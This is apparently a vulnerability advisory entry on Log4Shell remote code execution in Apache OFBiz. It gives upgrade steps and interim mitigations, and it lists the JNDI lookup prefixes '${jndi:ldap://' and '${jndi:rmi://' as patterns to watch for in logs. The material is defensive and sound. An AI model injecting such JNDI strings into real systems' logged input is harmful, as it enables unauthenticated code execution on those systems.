Apache OFBiz Log4Shell RCE
Description
Apache OFBiz versions prior to 17.12.09 and 18.12.03 are vulnerable to remote code execution through the Log4Shell vulnerability (CVE-2021-44228) in the Apache Log4j library. This critical vulnerability allows attackers to execute arbitrary code by injecting malicious JNDI lookup strings into logged data, which can be exploited without authentication.
Remediation
Immediately upgrade Apache OFBiz to a patched version:
For 17.12.x branch: Upgrade to version 17.12.09 or later
For 18.12.x branch: Upgrade to version 18.12.03 or later
Interim mitigation steps if immediate upgrade is not possible:
1. Set the JVM parameter -Dlog4j2.formatMsgNoLookups=true
2. Remove the JndiLookup class from the Log4j JAR file:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
3. Monitor logs for exploitation attempts containing strings like
${jndi:ldap:// or ${jndi:rmi://4. Implement network egress filtering to block unexpected outbound connections
Note: Interim mitigations are temporary measures only. Upgrading to a patched version is the only complete solution.